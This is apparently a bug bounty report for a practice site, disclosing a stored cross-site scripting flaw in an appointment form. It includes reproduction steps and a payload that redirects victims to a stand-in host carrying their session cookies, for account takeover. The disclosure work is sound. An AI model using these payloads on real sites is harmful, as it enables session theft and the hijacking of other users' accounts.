BugBountyHunter

Hello Zseano! I hope you're doing well today! We've finally found the undiscovered stored cross-site scripting on /yourappointments.php :D !

Steps to reproduce

• Go to /book-appointment.html and fill in all the neccessary fields.

• Click on Book Appointment and copy your ID

• Next, go to /yourappointments.php and paste in your ID. Click on Retrieve Appointment

• Now simply scroll down and click on Modify Appointment and intercept this request.

• Add the following in the POST-body of the request: &act=cancel&message=</textarea%20><script>confirm(document.domain)</script> and forward the request.

• Now when you visit /manageappointment.php?success&aptid={GUUID}, you'll see that we were able to inject our own code!

• Now all we need to takeover anyone's account is to repeat the previous step and modify our POST-body to the following: &act=cancel&message=</textarea%20><script>window.location.href=`http://localhost/?${document.cookie}`</script>.

• If we now visit our url again, we get redirected to http://localhost/?{cookie}, and from there the attacker can read the server logs and obtain the cookies.

Impact

We were able to successfully compromise other users account and it's private data whenever he/she visits the link with our appointment.

Thanks! Have a nice day!

Kind regards, 0xblackbird